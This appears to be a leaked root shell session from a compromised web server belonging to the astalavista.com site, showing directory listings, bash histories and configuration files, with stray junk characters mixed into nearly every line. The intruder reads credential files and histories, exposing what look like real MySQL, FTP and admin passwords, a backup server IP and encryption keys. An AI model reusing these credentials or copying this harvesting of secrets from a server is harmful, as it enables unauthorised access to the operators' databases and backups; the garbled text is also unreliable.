( Q& Z+ c+ c2 Z; Q0 d+ G# #( s9 C& |3 Z- v( { K. y- l/ G
#####################################################
7 A: ~% L" o" {, K2 e- C# #) J8 c, x' U4 z2 @9 I& H% M; g0 Y' l
# Admin Contact - 链接标记support@secureservertech.com #
. V N8 _' R3 U8 a G/ }# # w C& s- |+ x% \ t) t: k$ t' D
# Available ShortCuts #
! ~, V; [% p" u" A# #3 o4 |& ]1 s& Z( V
# nst - list active connections #; N+ G# ]5 P% `
# ddos - shows how many times each ip is connected #
4 c v' d' [& h6 p# ltr - restart the webserver #
0 u7 S. X1 @2 q- h# phpc - edit the php config file #( V8 P4 N" Q, b- V( t, x0 T+ V
# htc - edit the webserver configuration file #: x) w" p/ u: W7 h! n5 ~; r. F4 s
# up - uptime # h$ a% ~; M/ N8 Q: }7 R
# etd - edit the motd of the day file #
: j4 d/ Y) J% |! }# htr - start and restart apache if needed #
. t- ]5 ~# L! }2 _# syng - shows active SYN_RECV connections ## `9 F- E/ g+ d I
# synd - syn flood blocker - “synd -h” for usage #, U4 a9 k& b8 V9 N
#####################################################6 P: v- L- h9 k6 C' T8 W8 d( f# K: o
# NOTES: #
) d5 x, X( O K5 A: R# Last Upgrade - 12-08-2008 by JF #
5 I* Y. |2 V1 |# My.cnf/Mysql Optimization - 1-28-09 #
9 B& L1 H* f; |/ R, s# # t9 W3 i) M) T5 X
# #
$ g, j2 ~6 i" _- }# #
/ Q* g" `9 m S' L0 d( D#####################################################
. W( V3 H. |- I; R; t; ~5 l# W1 P8 g. H P
sh-3.2# lastlog | grep -v Never
# |3 q! ]2 ]8 UUsername Port From Latest% @( y( ~0 ]" Y, ~! U5 U
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20098 F& T& X G: p; T+ \' {; O$ e
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008. ^ [/ c% Q( V5 {$ S/ M
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009% a4 f& s; R1 a4 K
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009' A7 ?( c8 H% T8 U( B6 n% e6 s
. k! L* {: y: j$ L( H8 p$ X9 T4 x2 `8 fsh-3.2# ls -la
* C7 w1 Q% N! V9 r* Ctotal 453376
0 m7 w! ~& c+ G+ K( mdrwxr-x— 15 root root 4096 Jun 4 08:40 .
- u/ I3 N0 o- p& l4 V( g, x; {drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..2 f2 X/ M7 q1 f' W
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip+ u6 M3 \" m. T* ^$ r7 Y
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg5 U5 l# v. `8 o W2 y1 `3 _
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history- o0 R c9 b0 K" N& m) ] p% H
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
) S# u7 v/ n O$ O-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile0 T6 Q1 [. c0 \1 f
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
; ?# F$ ~6 f! }-rwx—— 1 root root 1899 Oct 28 2007 bk.sh+ I0 f B4 G8 f3 x5 T0 a8 r
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
/ E3 Q$ }* c- ^! N! B$ H& E' l-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
) g6 E c3 X& l3 Odrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
( m4 Y1 [3 j+ ~3 n# w-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
+ p- C7 w6 L* H, C6 s) L-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql9 d8 [' x7 D2 q1 ^" G1 e
drwx—— 2 root root 4096 Oct 28 2007 .elinks
" R( c* o$ P/ ddrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
- p, T7 C1 P. ^; t% W e/ l: ]! |-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
0 i8 e1 }0 x3 B6 Y: | E-rw——- 1 root root 0 Apr 16 13:19 .history
% o C% ?' D* ~9 U$ X( B, G-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
4 | w$ C1 F$ P6 K; [; h-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog6 q w7 }0 c1 U: d/ @7 ?! L
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
4 c/ K2 G; I; U8 [, h) g8 o9 r4 I! V-rw——- 1 root root 35 Jun 2 14:23 .lesshst
* U' [# {* }$ B! n9 Kdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp4 n0 [) y, o; f8 f3 r
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec6 ^: e5 T# \, {. L9 i. |
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz* e G# S3 g! [, t, J( j/ g
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
0 n; U* A$ s6 d/ M5 x, \-rwx—— 1 root root 760 Sep 18 2008 lp
/ A9 s$ Q6 q; B0 }drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
, j. O+ L2 T- ?6 z4 ~. Z% g3 y5 M-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz! L) k" m9 q! i0 a
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1/ N( ?4 q% n" M" o* R. \; V
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
8 x7 ?6 k' C, j+ e-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz. {4 r; f0 A- A# e* ?5 w: r8 k4 @
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3 ]1 S H5 u. a2 D- `2 }
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
! o+ e( N+ x1 w9 J8 Z* O1 v-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh/ ?* Z/ c* T K& j1 i: X0 t/ q: C
-rw——- 1 root root 41 Oct 19 2007 .my.cnf8 [. x$ P2 h9 }$ W% N, O$ K! d# s
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
# E/ v% i9 W' t. g3 G-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
/ B, X, [; z7 W2 j) Y-rw——- 1 root root 41 May 20 2008 .mytop- F2 r9 T8 K) j! Z t4 c
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6( q5 X% @8 |& m5 o& V5 t0 Z
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz* M3 p5 B! v0 E K
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp- ]" M. t3 q+ \2 F
-rw——- 1 root root 1462 Sep 21 2007 opt.php
% o+ ]$ x( _. j- ~6 w-rw-r–r– 1 root root 3371 Sep 22 2007 p
0 ]2 X. z/ i) V7 t0 l& j-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
; J0 I& q& M9 ?7 n-rw——- 1 root root 1024 Feb 3 21:32 .rnd
9 ^' I( O& h8 @) T4 x-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
4 X1 h; G9 s1 u: e) P* Y3 i* h, x2 E-rw-r–r– 1 root root 887 Nov 28 2007 server.key
* ^2 ]; B* ?8 y) t: G: f8 kdrwx—— 2 root root 4096 Oct 10 2008 .ssh
) Z8 Z+ m J7 B6 ], _5 n, n3 d-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
# L( p+ d. S) V( o7 k' u" v-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc! n; P3 t) M; d5 S: E
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip2 C" ]; @% c9 [( E
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1. I+ i3 K/ H5 h! }! @; I- W: q7 q
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
' h* Q2 P& [" k$ z, X8 h% Y. V-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh# E+ G0 E* p0 x/ x, E8 ~
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.05 h" |3 j1 ]& L4 y2 U
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
" Z/ e5 l" t- H3 i5 z) G+ Y: E-rw——- 1 root root 12997 May 16 2008 .viminfo
* }) t3 J) f1 x F2 }9 |( W# N: Z# A. l- m( k# @4 o; t$ Y: W
sh-3.2# cat .bash_history
1 |* d2 w5 ]2 `2 R Q[snip]" W6 {) l5 ^8 I6 q( h; g% p0 m+ _8 o
wget cp4sst.com/sstlinux.tar.gz- u. T( P% _. a0 T* X
tar zxvf sstlinux.tar.gz" ~1 m5 E" g* \' `+ Z
cd linux-2.6.27.107 |5 s* {8 s. ?1 K* {" S) n( D" O; ?2 Z
sh install.sh
7 p- W+ ]6 Z% }. r1 x! U) ~make bzImage ; make modules ; make modules_install ; make install' b' r/ h9 z5 ~, _( Z5 n5 `% m) R
make clean2 @+ K G ^4 E5 `
service mysqld restart+ ~- B) n6 T; j j- [( W
[snip]$ l- R$ x2 H$ h6 z& e5 N
cd /usr/sbin/
+ i+ J& ~- Q M7 F* Bchmod 4777 traceroute
9 c# Z# g, K' w/ j: ychmod 4777 ping
: n3 Z" z! u6 q, r% Straceroute -I 链接标记[url]www.astalavista.ch[/url]7 m2 W. h. l3 T) d
[snip]1 Y& t) P) d. f4 k5 r
vi /etc/csf/csf.conf1 S( V8 J1 f0 v( E* r
traceroute google.ch2 e. Y+ }4 n' M- v) @3 h8 n
service csf restart" u; v, k6 O3 F' H. e6 g( W% t
tracert google.ch
' V ^/ L$ C* d l2 } @- ~service csf restart5 Z8 t5 a! A+ T% Q$ m
traceroute 链接标记[url]www.google.ch[/url]) @9 \: q) g: N4 {. `
tracert 链接标记[url]www.google.ch[/url]0 ~+ L7 T D/ E" l8 W1 x
traceroute 链接标记[url]www.google.ch[/url]( D" `5 ]$ |, e" l
locate traceroute
* [+ j# Q" H" K1 ^- g% Y; _* ^9 pchown 4755 /bin/traceroute
0 T( v9 `1 `6 ^% A: achown 4777 /bin/traceroute
+ {6 y( W, Q6 ]/ E1 ~, Hlocate ping' W' S# B, v4 W: h
chown 4755 /bin/ping+ B2 R; I- c8 L- R4 W
chown 4777 /bin/ping8 k1 B9 f) O# w$ ~$ l' M5 r/ |% H
cd /bin/
& S% l5 p4 G& N1 f( Rls -ali | grep ping
1 ?# w7 Q- S8 V* M+ uchown root ping
$ i# q" }0 J' m2 v& m; t& \1 \ Qchmod 4755 ping1 o9 d1 E" ]+ d8 g) w
ls -ali | grep traceroute+ Q* Y, R1 n" H. w: X: J4 B, k$ j
chown root traceroute+ b( M9 a4 ?/ d, H3 Q/ t
chmod 4755 traceroute
$ o$ p- H+ T2 Ols -ali | grep traceroute
% K d. ?, V* ~5 q+ j9 e6 Ktraceroute -I 链接标记[url]www.google.ch[/url]
% M+ P, K$ N0 U- c6 s3 Q4 jtraceroute 链接标记[url]www.google.ch[/url]
/ n% X9 D/ ~+ C; L- r l+ s6 w0 dwhois pmsantos.ch
* r$ d- B' z2 w$ M[snip]
4 g5 e, r4 Q) |) J9 T1 E/ }- Fmysql -h com_contrexx2_live < /root/defaultp_ports.sql
t. D0 ^2 _) \, ?4 umysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
0 z; V1 d2 s& S& @ W7 p' Bmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql/ Y$ N" D6 X9 C1 z3 F: p; e
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
F* T, S H7 q0 Q [0 k# a* @top
' P' B. j( Y8 Oping ssth.ch) b; {7 ~: F( w
ping asdlkfaljgasd???ljg???lasj.ch
/ z* ^, Z" P' W/ Gping asdlkfaljgasdlasj.ch0 t6 j# v4 k) s4 q( f
ping 链接标记[url]www.ssth.ch[/url]
& C, f8 p$ h4 gping ssth.ch
f# X: f" M. T7 lnslookup 链接标记[url]www.google.ch[/url]- }. T3 Z8 i" K: E$ t
nslookup 链接标记[url]www.ssth.ch[/url]( o) V5 m% M/ v5 r
man nslookup/ ^' s- g' f. `& x
ping 链接标记[url]www.google.ch[/url]. n/ m; m8 N# P- V& I
nslookup 链接标记[url]www.google.ch[/url]5 |4 }, l2 X( E5 k) A0 E) ~7 {
nslookup 链接标记[url]www.google.ch[/url]: W, x+ ~) g- N8 z. S
nslookup salfjasdlf.ch2 R7 C" ^7 P' |# ? n; o* g8 d9 x
[snip]& t' {& a/ w$ Z
openssl passwd -1 sadf9 ?" ~: `" @! L; _
openssl passwd -1 5cZNHstdTy
' y* Q( L/ B& k# Umysql
3 `, x& d* b6 L) n$ Gmysql
! G( z6 |+ r, G6 Z [locate proftp2 T. _" g0 q2 k. \; {7 u+ R
vi /etc/proftpd.passwd
8 N, _- C( Q) h7 X4 X6 S& nservice proftpd restart8 ?2 O1 d, u1 \5 ]6 t) g* F
locate proftpd.conf
7 N. o2 w4 ]# C# W% M! E% Hvi /etc/proftpd.conf
9 t3 ?$ j7 @( {. U) H0 {' \/ Yvi /etc/proftpd.passwd/ s1 Z* x1 L/ n7 q% m( ^
service proftpd restart
2 h; o* Z& N: p5 V& }6 r: @. [[snip]
3 t8 L4 y% y" k, j# f/bin/sh /home/com/backup_system/backup.sh
' D6 d( O# z/ Z, a: T2 l$ v9 K( [; {tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin+ J: g4 H) f8 E# A6 d
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
5 z3 j* d- e7 f: w9 y* s, xmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql, c0 H K( D K" w6 {
ls -ali
( a4 E5 b1 z* fmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql) Z5 v# V2 U7 E, U
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql* ~2 k5 j7 S+ }! s
crontab -l+ e" U \- p' Y, O
crontab -l
1 b( k6 {# C. o1 kphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
7 U" ?( s9 l7 V1 {. f' g+ j3 m+ @/home/com/public_html/modifications/cronjobs/exploits.sh
! [$ `8 F, S" p( N8 j: twget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
# _. ~! [6 d2 S ^ }% etar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz( n Q# u# G5 Y/ t/ h0 a
cd lsws-4.0.3) H9 d4 m7 x* l
sh install.sh
5 V' @- j2 k+ I4 o$ k: A# `- ]) }uptime
1 ] U7 ?% Z8 thdparm -tt /dev/sda6 }6 U, ?, }/ _0 v- k/ W- }6 J+ U
iostat" U) U& C4 m+ A& b) ]
yum install iostat' s* y, d) ^2 e8 L6 G4 b. R
iostat
6 A8 z3 _+ v( V3 R# Uwhereis iostat
0 A {' f; K# o; j& ^$ cyjm clean all4 M! @2 ~( t3 L# m+ @
yum clean all ; yum -y update* P. h* a/ w3 |! \# [, U5 d7 {1 Q
iostat y. K" \1 U" g( l A4 [, ]8 k" S( ?$ k
yum install systat# x3 R ^/ m' R' `6 W
rpm -qa | grep iostat
) }# E+ G5 H! @' [- e% l% _, krpm -qa | grep sysstat
) W- a H' @& @rpm -qa | grep systat3 s' e( V; O9 G
dmesg -c
7 U& B* e, e8 w( G' csysctl -p
6 d# ~- V7 y3 guname -r
* e K2 i! q$ M' qcd /usr/src; @4 U2 I; Z8 u/ G' n
wget nix101.com/kernels/sstlinux.tar.gz
" C1 L+ J- w, ?2 ushutdown -r now' v& K2 [# r! [
nano -w /boot/grub/grub.conf5 j/ e' [3 ?1 _$ L2 D9 L/ |- ]2 X8 M
$ c( c2 I% B% p8 \4 `/ osh-3.2# cat .my.cnf" ]4 [0 }' | N; K3 t
[client]5 ?" ^+ M- u5 D: t! b
user=da_admin
* H5 a8 k; \1 T; k, i. npassword=X9dctmRH% M% H; [" ?; i# p
" v e* y1 F" h C( ?
sh-3.2# cat /home/com/backup_system/backup.sh) \1 s; L: Z, J* F% E
#!/bin/sh$ }" [* o" [+ m( N
#####################################################################
2 m2 o! V( O* _( |8 b# z$ [# #4 D8 n& f5 k! b. m9 H
# incremental backup for astalavista.com #
2 m9 P' Q2 t2 a2 U9 n5 @. ~4 x ] x# #) S- ^9 w) ]! l5 N3 X; S; `
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
3 t1 J8 i- J) M9 b% Y* k# #
0 Y/ Z$ ^: U% i, w8 a. u& b#####################################################################
t+ E4 G5 e8 E( z[snip]6 ~ ?0 K9 T6 V7 a: I# P
PROG_DIR=”/home/com/backup_system”;5 F+ P9 }+ ?! U4 n! n) j
BACKUP_DIR=”/home/com/backups”;+ h% ]9 q/ j8 Y& n) n7 M, _
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
! ]/ b( h+ D1 @( p1 t) i# u1 U& I# ftp for synology backup server
/ w4 d. f$ h/ Y0 A# ^3 pFTP_HOST=”212.254.194.163″;! g0 h9 z' ?; c; D4 C! O( n
FTP_PORT=”21″;# E+ ?' s( \5 t+ R/ }( j2 _* e
FTP_USER=”astalavista.com”;
- U- X0 t* b; ]) B. v- \FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;5 Q2 }/ n# Z8 w/ g
FTP_DIR=”/astalavista.com”;: _ D$ B+ V3 V! [- f: V7 ^/ `
# database
" [* H- @% H0 ?/ `2 n1 d1 P3 i; kDB_HOST=”localhost”;
. r. ?: m3 u: t6 [DB_USER=”contrexxuser2″;
4 [6 O( u3 C2 F8 {$ |DB_PASS=”0fEYNZgXz1pKe”;$ Y; L) J9 B# n0 l' o% k) _8 J$ U
DB_DATABASE1=”com_contrexx2_live”;
8 k5 z: ~, b: W! E6 d: p, s4 g" c; }DB_DATABASE2=”com_contrexx2″;" x" r8 Z& J5 P; W) d& a& J$ L
[snip]
3 g5 B" t( n1 Qftp -in $FTP_HOST $FTP_PORT <<EOF
; ~9 ?, s) W' t5 [, {/ vquote USER $FTP_USER
; \; L* A: s1 n2 E0 }9 ^quote PASS $FTP_PASS; h( K( |$ J5 {* a
cd $FTP_DIR+ ~7 N) S0 v+ e$ _# b
put $DB_FULLNAME-SQL_Dump.tar6 F4 z8 ~7 g* |/ \4 [
put $BACKUP_FULLNAME-Public_HTML.tar
4 G/ o3 t3 R4 O+ iclose
, ~# W, ]& } k' e, vbye
% @. V5 S Q( m# P8 |& ?6 _EOF9 _5 h7 C0 E' c$ Z$ m
1 C9 G( x( b M" e6 A
sh-3.2# cd /home
6 x% B) n2 `% R1 q1 h" d) `# h( qsh-3.2# ls -la
: N4 H. K. c2 ?- V" jtotal 120
# `& f" m( ~. V3 b' Y) Jdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .* c" ?3 p8 b% q& G* D8 A
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..% f+ V* x4 Y; O- c: G
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin' J8 a" O+ h2 {4 o7 x! U; y
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group. N8 F% _$ E9 c+ P8 C/ c o
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
r5 j. ^$ d$ C8 ?' Z6 Adrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet2 b3 S9 \4 R6 O; W' x
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup& O/ G; q: A) U4 N# B! C
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
6 P) r) @. ?4 S! _! Fdrwx–x–x 10 com com 4096 Apr 28 12:40 com- K3 a. M! O% a
drwxr-xr-x 2 root root 4096 May 17 2007 ftp" _5 q3 d( j* ~$ {$ N
drwx—— 3 jon jon 4096 Sep 21 2007 jon
0 J, V' {2 n+ ~1 ~8 Y5 M+ T3 E: odrwx—— 2 root root 16384 Sep 11 2007 lost+found
% i& }: D+ R/ l1 r* Vdrwxr-xr-x 2 root root 4096 Sep 14 2007 my- o' H$ Y) Q6 O. c) E4 G% }
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata5 n% e0 {7 z& O2 D
drwx—— 2 jon jon 4096 Sep 15 2007 test0 r5 h) \% Y" x+ L4 r! G( \8 M# G
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
' W, ^0 }% P8 G' s0 t& Z/ Y0 y, m! A( a+ e F ?) X: M
sh-3.2# cd admin
/ _# y0 O8 `1 |, msh-3.2# ls -la
0 X7 v. |* W$ c4 [* @0 Ototal 1735896& G, T( T+ q2 P. f+ ^4 T0 i) z5 q
drwx–x–x 9 admin admin 4096 Nov 28 2007 .$ |4 L) x: a2 Z7 d1 g. W
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, i9 W: |, t z" P Ddrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups6 o+ c H2 f" Q
drwx—— 2 admin admin 4096 Sep 28 2007 backups: m4 c- i! e, ]
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history. }8 I; f O1 e2 ?; E
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout) x. s9 }& Y @$ |) _' D
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile2 |/ W5 b' \* ]+ M- ]* y
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc1 M- v+ K8 Z7 o
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups) f" h3 e# D+ _- R4 N
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
/ H2 B! N! Z9 C1 Udrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
; ~! {% U' I8 f# t' M- r0 Z-rw-r–r– 1 root root 24 Sep 21 2007 info.php7 [5 ]# n5 C1 Q0 J
drwx—— 2 admin admin 4096 Sep 21 2007 mail
/ E8 s7 F }4 Z( R-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
+ @( \' I3 U% D9 o, ?-rw-r–r– 1 root root 887 Nov 28 2007 server.key, B, ]6 I1 `) k2 w: S, H
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
3 }4 s8 p. I5 |! C0 Z( R7 }-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
! ]. H5 o; h2 M, j7 T9 }. Bdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
8 c+ b5 [1 i: s- `1 Z/ [: R% G6 D. Q+ N* @* e( |5 ?( X6 Z8 f
sh-3.2# ..- g' X$ l M/ R# X/ P8 @ s
sh-3.2# cd jon. u- n4 t, N0 D: S" h* y" z# O1 R
sh-3.2# ls -la, z( K. W/ _5 J% S9 |
total 36
K( r9 Q5 G( V4 p& S# ~drwx—— 3 jon jon 4096 Sep 21 2007 .
" ?- L$ ?2 A6 T3 ~, k& Vdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..! K$ V# L& h0 B L: M$ n) N, H- b
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
; j0 W* N; u* [ O-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
$ l- v/ l9 l8 v& M7 R1 U-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile9 E2 O m# {8 w! {
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
' l; d0 j3 i* j1 E1 @ t0 U-rw-r–r– 1 root root 24 Sep 21 2007 info.php
5 u+ Q9 `, s; M* R" j" cdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html; }3 r* o( U3 Z3 b
; j4 b: F2 W$ j& @1 Dsh-3.2# cd ..
# D# S( i5 ?) A2 ?6 o% wsh-3.2# cd test
- I7 Q/ e1 M% J! E8 i3 @$ w( g5 Fsh-3.2# ls -la
2 m2 m3 V5 p. {/ u' itotal 48$ u5 p: A; Z7 i' ], I. U, d& P
drwx—— 2 jon jon 4096 Sep 15 2007 .) q' H& v$ N' a$ m' k* R
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
9 T. t6 J( m& z. K! u4 I-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
5 F/ V: A) N" ~+ K- o-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout& W0 Q4 F' A! g5 Q7 [! D
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
. b; I. A5 J5 Y-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
' A& `; o0 K+ N8 Tsh-3.2# cat .bash_history
7 a* H; p% C) A/usr/bin/mysqladmin -u root password PoliuJhytg671 C+ g" F& u0 Q5 g4 r! U6 q; ]
. |$ @& i7 m) o# T- \sh-3.2# cd ..
7 M6 m; p+ S+ r9 _8 D5 _sh-3.2# cd astanet9 I4 I" m7 V) c! h- U; g4 [8 \
sh-3.2# ls -la B) {4 ^6 a0 U% k
total 52$ ]) N5 B7 Q: F0 p2 b
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .. q/ O3 n& v* o- O) Y+ Y" L( ]% @
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
# Z" T" j5 E3 Zdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
7 {2 c- v" j6 ]& x. j-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history! o4 B" l! [1 a
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout1 ~1 k% W. X$ B% h0 a
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
6 X1 J- R0 \6 _ ^; V5 L-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc/ n M" u9 L5 R/ k+ v/ u
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
5 i$ [- @9 b% Kdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
" a* |0 P: L' Y7 [% V1 mdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
, h) O/ y A3 L; }-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history. R! f+ u! ^' T" N) k
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
* b( Q( c, n) T0 x8 X$ Y-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
( D7 V( T6 L) N" K) c" G( R3 o! \# D/ C! L& W& g7 \
sh-3.2# cd auth/$ i' ^: F; {/ [
sh-3.2# ls -la% `& t) u+ t* }+ ]
total 283 ~5 t8 V& V) e; T; D( A% N
drwxr-xr-x 2 root root 4096 Dec 23 16:00 ." m) P1 g' K s
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..! t2 ~0 G! x* c. p" y* m
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php E0 [3 p, g3 ^! b, P. n9 l: T
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php! L5 o2 q7 [7 Z
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
' V# t3 q8 u8 N8 l3 `-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
0 \, g1 t% L1 I+ ]" v$ h-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd, n+ y& a8 ~' v# A, ]% T9 x& N
; O3 v6 h3 k4 _2 P
sh-3.2# cat hackercontest.config.inc.php
- n( v0 S) C, T# _5 M* K3 j<?PHP% C5 u9 \9 {- ]
// Variabeln f?r Verbindung zur Datenbank //
! s) _/ R9 M4 x$conxHost = ‘localhost’; // MySQL hostname3 U1 W5 D8 M2 R) a# @/ [7 g1 e
$conxUser = ‘hackercontest’; // MySQL user
/ S3 y' t2 {2 U. h. Z% K$conxPassword = ‘K6m@7dUc’; // MySQL password
: o( A3 j {0 b: t$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish& [ e/ ^7 {7 R) Y
?>$ q5 v- N; F2 O
sh-3.2# cat hosting.config.inc.php
+ C0 }! c) @4 o' l/ P' V; ?<?PHP c+ I- ~% H C/ X& A$ _
// Variabeln f?r Verbindung zur Datenbank //
/ R- O' L4 \" z$conxHost = ‘localhost’; // MySQL hostname1 t- c* t8 b8 T
$conxUser = ‘hostinguser’; // MySQL user
# G9 a6 ~% F, b% K1 B4 y$conxPassword = ‘cXvB3981′; // MySQL password0 |0 p! v: V! ]3 F
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
/ p; P Q R/ W/ R+ F% \0 r?>( Y) w' V( Y0 L; P2 N+ T
& m" ?& F% o- U7 N& M
sh-3.2# cd ..
( }% k9 ]& T4 A" ~sh-3.2# cd com) ^9 f2 n, s% p! S* x: N
sh-3.2# ls -la
9 g1 l. H o3 o U$ i" |total 141208, l/ u/ t0 y; B9 n2 d4 B# S
drwx–x–x 10 com com 4096 Apr 28 12:40 .: [ a6 ?. w' [9 C
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
8 U& K9 V) J. L1 Zdrwx—— 2 com com 4096 Jun 4 04:04 backups! u) J: U1 S& G' o
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql- D) l2 g* p5 W! U4 ^. K: C
